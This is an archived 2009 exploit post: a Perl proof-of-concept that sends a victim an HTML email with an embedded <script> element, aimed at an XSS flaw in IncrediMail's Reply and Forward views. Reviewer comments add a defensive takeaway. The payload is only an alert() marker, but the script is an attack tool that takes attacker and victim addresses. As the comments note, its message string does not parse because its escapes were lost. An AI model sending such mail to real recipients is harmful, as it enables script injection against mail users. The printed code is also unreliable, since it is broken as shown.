
incredimail-xss.txt

Posted on 25 March 2009

#!/usr/bin/perl -w
# IncrediMail Xe (latest version) XSS Vulnerability
#
# Discovered by : Bui Quang Minh
#
# Description : Most popular mail clients now strip script code from mail content.
#               This is meant to prevent XSS exploitation (e.g. a stolen cookie).
#               IncrediMail also removes script code when the user reads mail.
#               However, I found that the "Reply" and "Forward" functions of the mail
#               client do not handle mail content well, resulting in an XSS vulnerability.
#
# My Blog : http://minhbq.blogspot.com
#
# NOTE(review): this listing was collapsed onto a single line by the page, and
# backslash escapes inside the string literals appear to have been lost with it
# (line terminators at the end of each header string, and the escaping of the
# inner double quotes around the boundary, charset and DOCTYPE values). As
# printed, the $buffer literal does not parse. Line breaks are restored here
# for readability; every code token is left exactly as the page shows it.
#
# NOTE(review): defensive takeaway from the description above: sanitising HTML
# only in the reading pane is not enough. The same filtering has to run on every
# path that renders or re-embeds message content, including the quoted original
# in Reply/Forward compose views. A mail gateway can also flag text/html parts
# that carry <script> elements.

use Net::SMTP;

# ARGV Check
# $#ARGV is the last index of @ARGV, so this requires exactly three arguments.
if ($#ARGV != 2) {
    print " USAGE: IncrediMail.pl <Mail Server> <Attacker Email> <VicTim Email> ";
    exit;
}

# No "use strict" is in effect, so these are package globals (-w only enables warnings).
$host = $ARGV[0];
$attacker = $ARGV[1];
$victim = $ARGV[2];

# Config SMTP
# Hello is the identity sent in the SMTP greeting. 'Hello world' is not a
# valid host name, which a receiving MTA can use as a rejection or scoring signal.
$smtp = Net::SMTP->new( Host => $host, Hello => 'Hello world', Timeout => 30) or die "Couldn't connect to Mail Server ";

# Attacker and Victim email
# These set the envelope sender and recipient; the From:/To: header lines
# inside $buffer below are fixed strings and do not use these values.
$smtp->mail($attacker);
$smtp->to($victim);

# Send email
# The message is a single-part multipart/mixed body whose only part is
# text/html containing a <script> element that calls alert(), i.e. a harmless
# marker showing that script content survived into the rendered view.
$buffer = "From: XSS Vulnerability ".
          "To: XSS Vulnerability ".
          "Subject: XSS Vulnerability ".
          "MIME-Version: 1.0 ".
          "Content-Type: multipart/mixed; ".
          " boundary="--=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019" ".
          "----=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019 ".
          "Content-Type: text/html; ".
          " charset="utf-8" ".
          "Content-Transfer-Encoding: quoted-printable ".
          "Reply or Sender for XSS Vulnerability ".
          "<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> ".
          "<HTML><BODY> ".
          "<script> alert('XSS Vulnerability') </script> ".
          "</BODY></HTML> ".
          "----=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019--";

# The return values of mail(), to(), data() and datasend() are never checked,
# so the final message is printed whether or not the server accepted anything.
# Note also that dataend() is not called before quit().
$smtp->data();
$smtp->datasend($buffer);
$smtp->quit();
print "Send Finish. ";

 
